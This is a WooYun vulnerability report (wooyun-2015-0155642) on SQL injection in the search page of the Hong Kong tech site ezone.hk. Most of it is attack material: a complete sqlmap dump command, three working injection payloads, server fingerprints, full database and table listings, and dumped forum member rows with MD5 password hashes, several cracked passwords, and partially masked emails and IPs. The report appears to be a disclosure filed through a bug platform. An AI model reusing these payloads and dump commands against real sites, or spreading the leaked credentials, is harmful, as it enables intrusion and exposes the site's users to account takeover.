ezone.hk主站存在SQL插入攻击（12W用户密码\邮箱地址及登陆IP泄露+超过200W网站访问日志泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155642

漏洞标题：ezone.hk主站存在SQL插入攻击（12W用户密码\邮箱地址及登陆IP泄露+超过200W网站访问日志泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-25 10:07

修复时间：2015-11-30 10:08

公开时间：2015-11-30 10:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

ezone.hk (e-zone.com.hk)
以全新面貌，提供一站式科技新聞，發布最新最熱的科技資訊、提供全面數碼情報，當中「新聞區」以科技、電腦、數碼及潮流新聞為主導。「討論區」讓網民討論熱門科技話題、吹水聊天、展現時下生活態度的分享平台；「提問區」讓網民互動交流 PC、DIGI 等四個範疇的科技知識，現已收藏近 20,000 條科技知識；「活動區」與多個機構媒體合辦或協辦各類活動及講座、提供業界的最新活動情報。

详细说明：

地址：http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag

$ python sqlmap.py -u "http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag" -p keyword --technique=BEU --random-agent --batch -D ez_discuz -T cdb_members -C username,password,email,credits,showemail,lastip --dump --start 1 --stop 10

| cdb_members                           | 124189  |

Database: ez_discuz
Table: cdb_members
[10 entries]
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
| username  | password                                     | email                    | credits | showemail | lastip          |
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
| 系統管理員     | d68d9702b299ab9c529b8eae61f1bdb8             | lkjbnm5a6                | 216     | 0         | **.**.**.**    |
| u00000004 | 4297f44b13955235245b2497399d7a93 (123123)    | aeroplane@**.**.**.** | 0       | 0         | <blank>         |
| u00000014 | e10adc3949ba59abbe56e057f20f883e (123456)    | joe1@**.**.**.**       | 0       | 0         | <blank>         |
| u00000018 | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | fgfdsfs                  | 0       | 0         | <blank>         |
| u00000020 | e10adc3949ba59abbe56e057f20f883e (123456)    | pang@**.**.**.**      | 0       | 0         | <blank>         |
| u00000021 | 4297f44b13955235245b2497399d7a93 (123123)    | mailaeroplane@**.**.**.**  | 0       | 0         | <blank>         |
| u00000024 | 4297f44b13955235245b2497399d7a93 (123123)    | info@**.**.**.**      | 0       | 0         | <blank>         |
| pangpang  | e10adc3949ba59abbe56e057f20f883e (123456)    | cyp000@**.**.**.**         | 3       | 0         | **.**.**.**  |
| SuperBO   | 596a96cc7bf9108cd896f33c44aedc8a (fuckyou)   | larryleung@**.**.**.**      | 1184    | 0         | **.**.**.** |
| u00000032 | e10adc3949ba59abbe56e057f20f883e (123456)    | ezone1@**.**.**.**          | 0       | 0         | <blank>         |
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+

Database: ezonedb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| visit_log                             | 1112444 |
| doc_questionnaire_reply_answer        | 1016913 |
| cms_collect_log                       | 932428  |

漏洞证明：

---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-1516') OR 5718=5718#&op=tag
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: keyword=-8131') OR 1 GROUP BY CONCAT(0x7170767071,(SELECT (CASE WHEN (6844=6844) THEN 1 ELSE 0 END)),0x716a6b7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&op=tag
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F') UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x4261544b4854774a524e6d726e667146476e64645357576a666252586d6666587a4e64664b676459,0x716a6b7171),NULL#&op=tag
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user:    'ezuser@**.**.**.**'
current user is DBA:    False
database management system users [1]:
[*] 'ezuser'@'**.**.**.**'
Database: ez_discuz
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| cdb_posts                             | 384125  |
| cdb_threads                           | 271680  |
| cdb_memberfields                      | 124783  |
| cdb_members                           | 124189  |
| cdb_attachments                       | 66407   |
| cdb_mythreads                         | 58647   |
| cdb_threadtags                        | 57876   |
| cdb_tags                              | 14188   |
| cdb_pms                               | 7667    |
| cdb_onlinetime                        | 6350    |
| cdb_threadsmod                        | 2308    |
| cdb_modworks                          | 1597    |
| cdb_typeoptionvars                    | 1457    |
| cdb_myposts                           | 1368    |
| cdb_rsscaches                         | 1243    |
| cdb_favorites                         | 330     |
| cdb_polloptions                       | 295     |
| cdb_access                            | 284     |
| cdb_words                             | 251     |
| cdb_settings                          | 230     |
| cdb_buddys                            | 179     |
| cdb_statvars                          | 154     |
| cdb_stats                             | 136     |
| cdb_forumfields                       | 123     |
| cdb_forums                            | 123     |
| cdb_spacecaches                       | 122     |
| cdb_smilies                           | 98      |
| cdb_stylevars                         | 80      |
| cdb_typeoptions                       | 74      |
| cdb_threadtypes                       | 71      |
| cdb_ratelog                           | 69      |
| cdb_polls                             | 56      |
| cdb_moderators                        | 49      |
| cdb_banned                            | 46      |
| cdb_caches                            | 41      |
| cdb_faqs                              | 34      |
| cdb_usergroups                        | 17      |
| cdb_advertisements                    | 16      |
| cdb_crons                             | 13      |
| cdb_magics                            | 12      |
| cdb_projects                          | 12      |
| cdb_debateposts                       | 11      |
| cdb_medals                            | 10      |
| cdb_bbcodes                           | 9       |
| cdb_typevars                          | 9       |
| cdb_templates                         | 8       |
| cdb_pmsearchindex                     | 6       |
| cdb_ranks                             | 5       |
| cdb_admingroups                       | 4       |
| cdb_onlinelist                        | 4       |
| cdb_subscriptions                     | 4       |
| cdb_typemodels                        | 4       |
| cdb_imagetypes                        | 2       |
| cdb_styles                            | 2       |
| cdb_adminsessions                     | 1       |
| cdb_attachtypes                       | 1       |
| cdb_debates                           | 1       |
| cdb_failedlogins                      | 1       |
| cdb_plugins                           | 1       |
| cdb_promotions                        | 1       |
| cdb_sessions                          | 1       |
+---------------------------------------+---------+
Database: ezoneems
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| cms_campaign_queue_process            | 118687  |
| cms_section_privilege                 | 129     |
| cms_selection                         | 80      |
| cms_campaign_job_entry                | 33      |
| cms_campaign_job_entry_history        | 25      |
| cms_campaign_job_entry_process        | 25      |
| cms_campaign_queue_log                | 25      |
| cms_section                           | 19      |
| cms_campaign                          | 14      |
| cms_m_ezone_job_entry                 | 13      |
| cms_record_content                    | 12      |
| cms_block_attachfile                  | 10      |
| cms_campaign_job                      | 9       |
| cms_campaign_job_stat                 | 8       |
| cms_m_ezone_job                       | 5       |
| cms_admin                             | 3       |
| cms_lang                              | 3       |
| cms_no_promote                        | 3       |
| cms_campaign_recipient                | 2       |
| cms_usergroup                         | 2       |
| cms_campaign_default                  | 1       |
| cms_edn                               | 1       |
| cms_mail_bounce_back_pool             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 2840    |
| STATISTICS                            | 555     |
| TABLES                                | 269     |
| KEY_COLUMN_USAGE                      | 239     |
| TABLE_CONSTRAINTS                     | 221     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| SCHEMA_PRIVILEGES                     | 80      |
| CHARACTER_SETS                        | 36      |
| SCHEMATA                              | 5       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: ezonedb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| visit_log                             | 1112444 |
| doc_questionnaire_reply_answer        | 1016913 |
| cms_collect_log                       | 932428  |
| doc_jetso_reply                       | 862432  |
| doc_questionnaire_reply_answer_n      | 821014  |
| doc_jetso_reply_new                   | 743044  |
| doc_element_description               | 170907  |
| site_user                             | 128969  |
| site_user_new                         | 103638  |
| doc_element_image                     | 87079   |
| doc_questionnaire_reply               | 72735   |
| doc_catalog_content                   | 60796   |
| doc_questionnaire_reply_new           | 55566   |
| doc_tag                               | 48933   |
| site_document                         | 46368   |
| doc_image                             | 44882   |
| doc_channelnews_tag                   | 41445   |
| cms_news                              | 36010   |
| doc_element_title                     | 34605   |
| doc_voting_reply                      | 26049   |
| doc_tag_new                           | 25694   |
| doc_tips                              | 23788   |
| doc_event_session_reply               | 22553   |
| doc_questionnaire_question_ans        | 18177   |
| doc_event_session_reply_new           | 17912   |
| site_document_0602                    | 17849   |
| cms_weather_data                      | 12993   |
| doc_tips_new                          | 11966   |
| doc_upload                            | 11648   |
| doc_channelnews                       | 10087   |
| cms_comments                          | 10033   |
| hits                                  | 7302    |
| doc_tips_reply                        | 5449    |
| doc_tips_reply_new                    | 5409    |
| doc_questionnaire_question            | 3995    |
| doc_element_testphoto                 | 3965    |
| cms_source_linkage                    | 3313    |
| reply_hits                            | 2513    |
| doc_catalog                           | 2392    |
| doc_test                              | 2009    |
| doc_jetso                             | 1814    |
| doc_voting_answer                     | 1615    |
| cms_discuz_pool                       | 1498    |
| doc_banner                            | 1472    |
| cms_liveblog_post                     | 1403    |
| doc_forum_reply                       | 936     |
| doc_event                             | 736     |
| doc_jetso_announcement                | 684     |
| doc_element_testvideo                 | 398     |
| doc_voting                            | 316     |
| doc_event_session                     | 286     |
| doc_questionnaire                     | 265     |
| doc_wallpaper                         | 265     |
| doc_forum                             | 191     |
| doc_program                           | 124     |
| sys_lookup                            | 71      |
| doc_element_video                     | 69      |
| doc_element_textarea                  | 66      |
| site_workplace                        | 52      |
| doc_element_video_link                | 51      |
| site_application                      | 50      |
| cms_newsreportor                      | 38      |
| cms_subchannel                        | 34      |
| doc_index_layout                      | 34      |
| sys_applicationtype                   | 27      |
| doc_video                             | 23      |
| cms_meta                              | 13      |
| cms_navigation                        | 12      |
| cms_source                            | 12      |
| cms_category                          | 6       |
| doc_element_attachment                | 6       |
| cms_liveblog                          | 5       |
| cms_usermanagement                    | 4       |
| doc_event_reply                       | 2       |
| doc_video_link                        | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ez_discuz
Table: cdb_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: ez_discuz
Table: cdb_forumfields
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: ezoneems
Table: cms_campaign
[1 column]
+----------------------+-------------+
| Column               | Type        |
+----------------------+-------------+
| publicreportpassword | varchar(20) |
+----------------------+-------------+
Database: ezoneems
Table: cms_survey
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: ezoneems
Table: cms_member_record
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: ezoneems
Table: cms_campaign_job
[1 column]
+----------------------+-------------+
| Column               | Type        |
+----------------------+-------------+
| publicreportpassword | varchar(20) |
+----------------------+-------------+
Database: ezoneems
Table: cms_mail_bounce_back_pool
[1 column]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| poolpassword | varchar(255) |
+--------------+--------------+
Database: ezoneems
Table: cms_admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: ezonedb
Table: site_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(200) |
+----------+--------------+

Database: ez_discuz
Table: cdb_members
[46 columns]
+--------------+-----------------------+
| Column       | Type                  |
+--------------+-----------------------+
| accessmasks  | tinyint(1)            |
| adminid      | tinyint(1)            |
| bday         | date                  |
| credits      | int(10)               |
| customshow   | tinyint(1) unsigned   |
| dateformat   | tinyint(1)            |
| digestposts  | smallint(6) unsigned  |
| editormode   | tinyint(1) unsigned   |
| email        | char(40)              |
| extcredits1  | int(10)               |
| extcredits2  | int(10)               |
| extcredits3  | int(10)               |
| extcredits4  | int(10)               |
| extcredits5  | int(10)               |
| extcredits6  | int(10)               |
| extcredits7  | int(10)               |
| extcredits8  | int(10)               |
| extgroupids  | char(20)              |
| gender       | tinyint(1)            |
| groupexpiry  | int(10) unsigned      |
| groupid      | smallint(6) unsigned  |
| invisible    | tinyint(1)            |
| lastactivity | int(10) unsigned      |
| lastip       | char(15)              |
| lastpost     | int(10) unsigned      |
| lastvisit    | int(10) unsigned      |
| newpm        | tinyint(1)            |
| newsletter   | tinyint(1)            |
| oltime       | smallint(6) unsigned  |
| pageviews    | mediumint(8) unsigned |
| password     | char(32)              |
| pmsound      | tinyint(1)            |
| posts        | mediumint(8) unsigned |
| ppp          | tinyint(3) unsigned   |
| regdate      | int(10) unsigned      |
| regip        | char(15)              |
| secques      | char(8)               |
| showemail    | tinyint(1)            |
| sigstatus    | tinyint(1)            |
| styleid      | smallint(6) unsigned  |
| timeformat   | tinyint(1)            |
| timeoffset   | char(4)               |
| tpp          | tinyint(3) unsigned   |
| uid          | mediumint(8) unsigned |
| username     | char(15)              |
| xspacestatus | tinyint(1)            |
+--------------+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-1516') OR 5718=5718#&op=tag
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: keyword=-8131') OR 1 GROUP BY CONCAT(0x7170767071,(SELECT (CASE WHEN (6844=6844) THEN 1 ELSE 0 END)),0x716a6b7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#&op=tag
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F') UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x4261544b4854774a524e6d726e667146476e64645357576a666252586d6666587a4e64664b676459,0x716a6b7171),NULL#&op=tag
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5
Database: ez_discuz
Table: cdb_members
[10 entries]
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
| username  | password                                     | email                    | credits | showemail | lastip          |
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+
| 系統管理員     | d68d9702b299ab9c529b8eae61f1bdb8             | lkjbnm5a6                | 216     | 0         | **.**.**.**    |
| u00000004 | 4297f44b13955235245b2497399d7a93 (123123)    | aeroplane@**.**.**.** | 0       | 0         | <blank>         |
| u00000014 | e10adc3949ba59abbe56e057f20f883e (123456)    | joe1@**.**.**.**       | 0       | 0         | <blank>         |
| u00000018 | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | fgfdsfs                  | 0       | 0         | <blank>         |
| u00000020 | e10adc3949ba59abbe56e057f20f883e (123456)    | pang@**.**.**.**      | 0       | 0         | <blank>         |
| u00000021 | 4297f44b13955235245b2497399d7a93 (123123)    | mailaeroplane@**.**.**.**  | 0       | 0         | <blank>         |
| u00000024 | 4297f44b13955235245b2497399d7a93 (123123)    | info@**.**.**.**      | 0       | 0         | <blank>         |
| pangpang  | e10adc3949ba59abbe56e057f20f883e (123456)    | cyp000@**.**.**.**         | 3       | 0         | **.**.**.**  |
| SuperBO   | 596a96cc7bf9108cd896f33c44aedc8a (fuckyou)   | larryleung@**.**.**.**      | 1184    | 0         | **.**.**.** |
| u00000032 | e10adc3949ba59abbe56e057f20f883e (123456)    | ezone1@**.**.**.**          | 0       | 0         | <blank>         |
+-----------+----------------------------------------------+--------------------------+---------+-----------+-----------------+

修复方案：

加过滤。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-30 10:08

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155642

漏洞标题：ezone.hk主站存在SQL插入攻击（12W用户密码\邮箱地址及登陆IP泄露+超过200W网站访问日志泄露）（香港地區）

相关厂商：ezone.hk

漏洞作者：路人甲

提交时间：2015-11-25 10:07

修复时间：2015-11-30 10:08

公开时间：2015-11-30 10:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155642

漏洞标题：ezone.hk主站存在SQL插入攻击（12W用户密码\邮箱地址及登陆IP泄露+超过200W网站访问日志泄露）（香港地區）

相关厂商：ezone.hk

漏洞作者： 路人甲

提交时间：2015-11-25 10:07

修复时间：2015-11-30 10:08

公开时间：2015-11-30 10:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155642"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云